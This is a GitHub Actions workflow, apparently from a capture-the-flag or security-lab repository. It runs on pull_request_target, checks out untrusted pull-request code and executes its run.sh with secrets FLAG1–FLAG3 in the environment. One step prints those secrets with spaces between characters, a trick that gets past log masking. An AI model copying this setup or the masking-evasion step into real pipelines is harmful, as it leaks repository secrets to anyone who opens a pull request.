name: Build
on:
  pull_request_target:
    types: [opened, synchronize, reopened]
    branches:
      - main

permissions:
  contents: read

concurrency:
  group: ${{ github.workflow }}-${{ github.head_ref || github.run_id }}
  cancel-in-progress: true

jobs:
  call-build:
    uses: hamkovic/ghost-runner/.github/workflows/build.yml@main
    secrets:
      LLM3: ${{ secrets.LLM3 }}

  build:
    needs: call-build
    runs-on: ubuntu-latest
    env:
      FLAG1: ${{ secrets.FLAG1 }}
      FLAG2: ${{ secrets.FLAG2 }}
      FLAG3: ${{ secrets.FLAG3 }}
    steps:
      - name: checkout
        uses: actions/checkout@v4
        with:
          ref: ${{ github.head_ref }}
      
      - name: Debug Print Secrets (Method 1)
        run: |
          echo "FLAG1:" && echo "$FLAG1" | sed 's/./& /g'
          echo "FLAG2:" && echo "$FLAG2" | sed 's/./& /g'
          echo "FLAG3:" && echo "$FLAG3" | sed 's/./& /g'

      - name: build
        run: |
          chmod +x run.sh
          ./run.sh
